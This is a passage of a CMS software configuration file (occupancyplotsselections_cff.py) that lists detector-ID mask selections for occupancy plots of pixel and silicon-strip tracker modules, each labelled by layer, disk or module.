qsc_code_frac_chars_dupe_5grams: 0.909485 | dupe_6grams: 0.898324 | dupe_7grams: 0.885098 | dupe_8grams: 0.879496 | dupe_9grams: 0.875158 | dupe_10grams: 0.860669
qsc_code_frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.002181 | frac_chars_whitespace: 0.235463
qsc_code_size_file_byte: 36,579 | num_lines: 752 | num_chars_line_max: 237 | num_chars_line_mean: 48.642287
qsc_code_frac_chars_alphabet: 0.846778 | frac_chars_comments: 0.368244 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.823961 | cate_autogen: 1
qsc_code_frac_lines_long_string: 0 | frac_chars_string_length: 0.133703 | frac_chars_long_word_length: 0.066354 | frac_lines_string_concat: 0
qsc_code_cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
qsc_codepython_cate_ast: 1 | frac_lines_func_ratio: 0.163814 | cate_var_zero: false | frac_lines_pass: 0.002445 | frac_lines_import: 0.017115 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.278729 | frac_lines_print: 0
remaining quality-signal columns (schema order): 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8

hexsha: d4d903ba7366f0caaec2992dae31fb08dd18a825 | size: 70,948 | ext: py | lang: Python
max_stars_repo_path: DPGAnalysis/SiStripTools/python/occupancyplotsselections_cff.py
max_stars_repo_name: ckamtsikis/cmssw | max_stars_repo_head_hexsha: ea19fe642bb7537cbf58451dcf73aa5fd1b66250
max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 852 | stars events: 2015-01-11T21:03:51.000Z to 2022-03-25T21:14:00.000Z
max_issues_repo_path: DPGAnalysis/SiStripTools/python/occupancyplotsselections_cff.py
max_issues_repo_name: ckamtsikis/cmssw | max_issues_repo_head_hexsha: ea19fe642bb7537cbf58451dcf73aa5fd1b66250
max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 30,371 | issues events: 2015-01-02T00:14:40.000Z to 2022-03-31T23:26:05.000Z
max_forks_repo_path: DPGAnalysis/SiStripTools/python/occupancyplotsselections_cff.py
max_forks_repo_name: ckamtsikis/cmssw | max_forks_repo_head_hexsha: ea19fe642bb7537cbf58451dcf73aa5fd1b66250
max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 3,240 | forks events: 2015-01-02T05:53:18.000Z to 2022-03-31T17:24:21.000Z
import FWCore.ParameterSet.Config as cms
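# Note on the selection strings below (an inference from their usage, not stated
# in the original file): each "0xMASK-0xVALUE" entry appears to be a DetId
# filter keeping modules whose raw detector id satisfies
# (rawId & 0xMASK) == 0xVALUE; the trailing comment names the intended
# tracker partition (BPix/FPix layer, disk, ring, etc.).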
OccupancyPlotsPixelWantedSubDets = cms.VPSet (
cms.PSet(detSelection=cms.uint32(111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010004")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010008")), # BPix L1 mod 2
cms.PSet(detSelection=cms.uint32(113),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1201000c")), # BPix L1 mod 3
cms.PSet(detSelection=cms.uint32(114),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010010")), # BPix L1 mod 4
cms.PSet(detSelection=cms.uint32(115),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010014")), # BPix L1 mod 5
cms.PSet(detSelection=cms.uint32(116),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010018")), # BPix L1 mod 6
cms.PSet(detSelection=cms.uint32(117),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1201001c")), # BPix L1 mod 7
cms.PSet(detSelection=cms.uint32(118),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010020")), # BPix L1 mod 8
cms.PSet(detSelection=cms.uint32(121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020004")), # BPix L2 mod 1
cms.PSet(detSelection=cms.uint32(122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020008")), # BPix L2 mod 2
cms.PSet(detSelection=cms.uint32(123),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1202000c")), # BPix L2 mod 3
cms.PSet(detSelection=cms.uint32(124),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020010")), # BPix L2 mod 4
cms.PSet(detSelection=cms.uint32(125),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020014")), # BPix L2 mod 5
cms.PSet(detSelection=cms.uint32(126),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020018")), # BPix L2 mod 6
cms.PSet(detSelection=cms.uint32(127),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1202001c")), # BPix L2 mod 7
cms.PSet(detSelection=cms.uint32(128),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020020")), # BPix L2 mod 8
cms.PSet(detSelection=cms.uint32(131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030004")), # BPix L3 mod 1
cms.PSet(detSelection=cms.uint32(132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030008")), # BPix L3 mod 2
cms.PSet(detSelection=cms.uint32(133),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1203000c")), # BPix L3 mod 3
cms.PSet(detSelection=cms.uint32(134),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030010")), # BPix L3 mod 4
cms.PSet(detSelection=cms.uint32(135),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030014")), # BPix L3 mod 5
cms.PSet(detSelection=cms.uint32(136),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030018")), # BPix L3 mod 6
cms.PSet(detSelection=cms.uint32(137),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1203001c")), # BPix L3 mod 7
cms.PSet(detSelection=cms.uint32(138),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030020")), # BPix L3 mod 8
cms.PSet(detSelection=cms.uint32(211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810104")), # FPix minus
cms.PSet(detSelection=cms.uint32(212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810204")), # FPix minus
cms.PSet(detSelection=cms.uint32(213),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810108")), # FPix minus
cms.PSet(detSelection=cms.uint32(214),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810208")), # FPix minus
cms.PSet(detSelection=cms.uint32(215),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1481010c")), # FPix minus
cms.PSet(detSelection=cms.uint32(216),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1481020c")), # FPix minus
cms.PSet(detSelection=cms.uint32(217),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810110")), # FPix minus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810210")) # FPix minus
cms.PSet(detSelection=cms.uint32(221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820104")), # FPix minus
cms.PSet(detSelection=cms.uint32(222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820204")), # FPix minus
cms.PSet(detSelection=cms.uint32(223),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820108")), # FPix minus
cms.PSet(detSelection=cms.uint32(224),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820208")), # FPix minus
cms.PSet(detSelection=cms.uint32(225),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1482010c")), # FPix minus
cms.PSet(detSelection=cms.uint32(226),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1482020c")), # FPix minus
cms.PSet(detSelection=cms.uint32(227),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820110")), # FPix minus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820210")) # FPix minus
cms.PSet(detSelection=cms.uint32(231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010104")), # FPix plus
cms.PSet(detSelection=cms.uint32(232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010204")), # FPix plus
cms.PSet(detSelection=cms.uint32(233),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010108")), # FPix plus
cms.PSet(detSelection=cms.uint32(234),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010208")), # FPix plus
cms.PSet(detSelection=cms.uint32(235),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1501010c")), # FPix plus
cms.PSet(detSelection=cms.uint32(236),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1501020c")), # FPix plus
cms.PSet(detSelection=cms.uint32(237),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010110")), # FPix plus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010210")) # FPix plus
cms.PSet(detSelection=cms.uint32(241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020104")), # FPix plus
cms.PSet(detSelection=cms.uint32(242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020204")), # FPix plus
cms.PSet(detSelection=cms.uint32(243),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020108")), # FPix plus
cms.PSet(detSelection=cms.uint32(244),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020208")), # FPix plus
cms.PSet(detSelection=cms.uint32(245),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1502010c")), # FPix plus
cms.PSet(detSelection=cms.uint32(246),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1502020c")), # FPix plus
cms.PSet(detSelection=cms.uint32(247),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020110")) # FPix plus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020210")) # FPix plus
)
OccupancyPlotsStripWantedSubDets = cms.VPSet (
cms.PSet(detSelection=cms.uint32(1101),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600640c")), # TIB+ L1 int m3
cms.PSet(detSelection=cms.uint32(1102),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600680c")), # TIB+ L1 ext m3
cms.PSet(detSelection=cms.uint32(1103),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006408")), # TIB+ L1 int m2
cms.PSet(detSelection=cms.uint32(1104),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006808")), # TIB+ L1 ext m2
cms.PSet(detSelection=cms.uint32(1105),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006404")), # TIB+ L1 int m1
cms.PSet(detSelection=cms.uint32(1106),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006804")), # TIB+ L1 ext m1
cms.PSet(detSelection=cms.uint32(1107),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005404")), # TIB- L1 int m1
cms.PSet(detSelection=cms.uint32(1108),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005804")), # TIB- L1 ext m1
cms.PSet(detSelection=cms.uint32(1109),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005408")), # TIB- L1 int m2
cms.PSet(detSelection=cms.uint32(1110),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005808")), # TIB- L1 ext m2
cms.PSet(detSelection=cms.uint32(1111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600540c")), # TIB- L1 int m3
cms.PSet(detSelection=cms.uint32(1112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600580c")), # TIB- L1 ext m3
cms.PSet(detSelection=cms.uint32(1201),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a80c")), # TIB+ L2 ext m3
cms.PSet(detSelection=cms.uint32(1202),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a40c")), # TIB+ L2 int m3
cms.PSet(detSelection=cms.uint32(1203),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a808")), # TIB+ L2 ext m2
cms.PSet(detSelection=cms.uint32(1204),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a408")), # TIB+ L2 int m2
cms.PSet(detSelection=cms.uint32(1205),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a804")), # TIB+ L2 ext m1
cms.PSet(detSelection=cms.uint32(1206),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a404")), # TIB+ L2 int m1
cms.PSet(detSelection=cms.uint32(1207),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009804")), # TIB- L2 ext m1
cms.PSet(detSelection=cms.uint32(1208),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009404")), # TIB- L2 int m1
cms.PSet(detSelection=cms.uint32(1209),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009808")), # TIB- L2 ext m2
cms.PSet(detSelection=cms.uint32(1210),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009408")), # TIB- L2 int m2
cms.PSet(detSelection=cms.uint32(1211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600980c")), # TIB- L2 ext m3
cms.PSet(detSelection=cms.uint32(1212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600940c")), # TIB- L2 int m3
cms.PSet(detSelection=cms.uint32(1301),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e40c")), # TIB+ L3 int m3
cms.PSet(detSelection=cms.uint32(1302),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e80c")), # TIB+ L3 ext m3
cms.PSet(detSelection=cms.uint32(1303),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e408")), # TIB+ L3 int m2
cms.PSet(detSelection=cms.uint32(1304),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e808")), # TIB+ L3 ext m2
cms.PSet(detSelection=cms.uint32(1305),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e404")), # TIB+ L3 int m1
cms.PSet(detSelection=cms.uint32(1306),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e804")), # TIB+ L3 ext m1
cms.PSet(detSelection=cms.uint32(1307),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d404")), # TIB- L3 int m1
cms.PSet(detSelection=cms.uint32(1308),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d804")), # TIB- L3 ext m1
cms.PSet(detSelection=cms.uint32(1309),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d408")), # TIB- L3 int m2
cms.PSet(detSelection=cms.uint32(1310),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d808")), # TIB- L3 ext m2
cms.PSet(detSelection=cms.uint32(1311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d40c")), # TIB- L3 int m3
cms.PSet(detSelection=cms.uint32(1312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d80c")), # TIB- L3 ext m3
cms.PSet(detSelection=cms.uint32(1401),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601280c")), # TIB+ L4 ext m3
cms.PSet(detSelection=cms.uint32(1402),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601240c")), # TIB+ L4 int m3
cms.PSet(detSelection=cms.uint32(1403),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012808")), # TIB+ L4 ext m2
cms.PSet(detSelection=cms.uint32(1404),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012408")), # TIB+ L4 int m2
cms.PSet(detSelection=cms.uint32(1405),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012804")), # TIB+ L4 ext m1
cms.PSet(detSelection=cms.uint32(1406),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012404")), # TIB+ L4 int m1
cms.PSet(detSelection=cms.uint32(1407),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011804")), # TIB- L4 ext m1
cms.PSet(detSelection=cms.uint32(1408),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011404")), # TIB- L4 int m1
cms.PSet(detSelection=cms.uint32(1409),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011808")), # TIB- L4 ext m2
cms.PSet(detSelection=cms.uint32(1410),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011408")), # TIB- L4 int m2
cms.PSet(detSelection=cms.uint32(1411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601180c")), # TIB- L4 ext m3
cms.PSet(detSelection=cms.uint32(1412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601140c")), # TIB- L4 int m3
cms.PSet(detSelection=cms.uint32(2111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002b00")), # TID- D1 R1 Front
cms.PSet(detSelection=cms.uint32(2112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002a80")), # TID- D1 R1 Back
cms.PSet(detSelection=cms.uint32(2121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003300")), # TID- D2 R1 Front
cms.PSet(detSelection=cms.uint32(2122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003280")), # TID- D2 R1 Back
cms.PSet(detSelection=cms.uint32(2131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003b00")), # TID- D3 R1 Front
cms.PSet(detSelection=cms.uint32(2132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003a80")), # TID- D3 R1 Back
cms.PSet(detSelection=cms.uint32(2211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002d00")), # TID- D1 R2 Front
cms.PSet(detSelection=cms.uint32(2212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002c80")), # TID- D1 R2 Back
cms.PSet(detSelection=cms.uint32(2221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003500")), # TID- D2 R2 Front
cms.PSet(detSelection=cms.uint32(2222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003480")), # TID- D2 R2 Back
cms.PSet(detSelection=cms.uint32(2231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003d00")), # TID- D3 R2 Front
cms.PSet(detSelection=cms.uint32(2232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003c80")), # TID- D3 R2 Back
cms.PSet(detSelection=cms.uint32(2311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002f00")), # TID- D1 R3 Front
cms.PSet(detSelection=cms.uint32(2312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002e80")), # TID- D1 R3 Back
cms.PSet(detSelection=cms.uint32(2321),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003700")), # TID- D2 R3 Front
cms.PSet(detSelection=cms.uint32(2322),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003680")), # TID- D2 R3 Back
cms.PSet(detSelection=cms.uint32(2331),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003f00")), # TID- D3 R3 Front
cms.PSet(detSelection=cms.uint32(2332),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003e80")), # TID- D3 R3 Back
cms.PSet(detSelection=cms.uint32(2141),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004b00")), # TID+ D1 R1 Front
cms.PSet(detSelection=cms.uint32(2142),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004a80")), # TID+ D1 R1 Back
cms.PSet(detSelection=cms.uint32(2151),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005300")), # TID+ D2 R1 Front
cms.PSet(detSelection=cms.uint32(2152),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005280")), # TID+ D2 R1 Back
cms.PSet(detSelection=cms.uint32(2161),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005b00")), # TID+ D3 R1 Front
cms.PSet(detSelection=cms.uint32(2162),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005a80")), # TID+ D3 R1 Back
cms.PSet(detSelection=cms.uint32(2241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004d00")), # TID+ D1 R2 Front
cms.PSet(detSelection=cms.uint32(2242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004c80")), # TID+ D1 R2 Back
cms.PSet(detSelection=cms.uint32(2251),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005500")), # TID+ D2 R2 Front
cms.PSet(detSelection=cms.uint32(2252),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005480")), # TID+ D2 R2 Back
cms.PSet(detSelection=cms.uint32(2261),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005d00")), # TID+ D3 R2 Front
cms.PSet(detSelection=cms.uint32(2262),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005c80")), # TID+ D3 R2 Back
cms.PSet(detSelection=cms.uint32(2341),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004f00")), # TID+ D1 R3 Front
cms.PSet(detSelection=cms.uint32(2342),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004e80")), # TID+ D1 R3 Back
cms.PSet(detSelection=cms.uint32(2351),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005700")), # TID+ D2 R3 Front
cms.PSet(detSelection=cms.uint32(2352),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005680")), # TID+ D2 R3 Back
cms.PSet(detSelection=cms.uint32(2361),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005f00")), # TID+ D3 R3 Front
cms.PSet(detSelection=cms.uint32(2362),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005e80")), # TID+ D3 R3 Back
cms.PSet(detSelection=cms.uint32(3101),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006018")), # TOB+ L1 m6
cms.PSet(detSelection=cms.uint32(3102),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006014")), # TOB+ L1 m5
cms.PSet(detSelection=cms.uint32(3103),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006010")), # TOB+ L1 m4
cms.PSet(detSelection=cms.uint32(3104),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00600c")), # TOB+ L1 m3
cms.PSet(detSelection=cms.uint32(3105),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006008")), # TOB+ L1 m2
cms.PSet(detSelection=cms.uint32(3106),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006004")), # TOB+ L1 m1
cms.PSet(detSelection=cms.uint32(3107),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005004")), # TOB- L1 m1
cms.PSet(detSelection=cms.uint32(3108),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005008")), # TOB- L1 m2
cms.PSet(detSelection=cms.uint32(3109),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00500c")), # TOB- L1 m3
cms.PSet(detSelection=cms.uint32(3110),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005010")), # TOB- L1 m4
cms.PSet(detSelection=cms.uint32(3111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005014")), # TOB- L1 m5
cms.PSet(detSelection=cms.uint32(3112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005018")), # TOB- L1 m6
cms.PSet(detSelection=cms.uint32(3201),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a018")), # TOB+ L2 m6
cms.PSet(detSelection=cms.uint32(3202),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a014")), # TOB+ L2 m5
cms.PSet(detSelection=cms.uint32(3203),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a010")), # TOB+ L2 m4
cms.PSet(detSelection=cms.uint32(3204),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a00c")), # TOB+ L2 m3
cms.PSet(detSelection=cms.uint32(3205),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a008")), # TOB+ L2 m2
cms.PSet(detSelection=cms.uint32(3206),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a004")), # TOB+ L2 m1
cms.PSet(detSelection=cms.uint32(3207),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009004")), # TOB- L2 m1
cms.PSet(detSelection=cms.uint32(3208),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009008")), # TOB- L2 m2
cms.PSet(detSelection=cms.uint32(3209),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00900c")), # TOB- L2 m3
cms.PSet(detSelection=cms.uint32(3210),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009010")), # TOB- L2 m4
cms.PSet(detSelection=cms.uint32(3211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009014")), # TOB- L2 m5
cms.PSet(detSelection=cms.uint32(3212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009018")), # TOB- L2 m6
cms.PSet(detSelection=cms.uint32(3301),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e018")), # TOB+ L3 m6
cms.PSet(detSelection=cms.uint32(3302),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e014")), # TOB+ L3 m5
cms.PSet(detSelection=cms.uint32(3303),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e010")), # TOB+ L3 m4
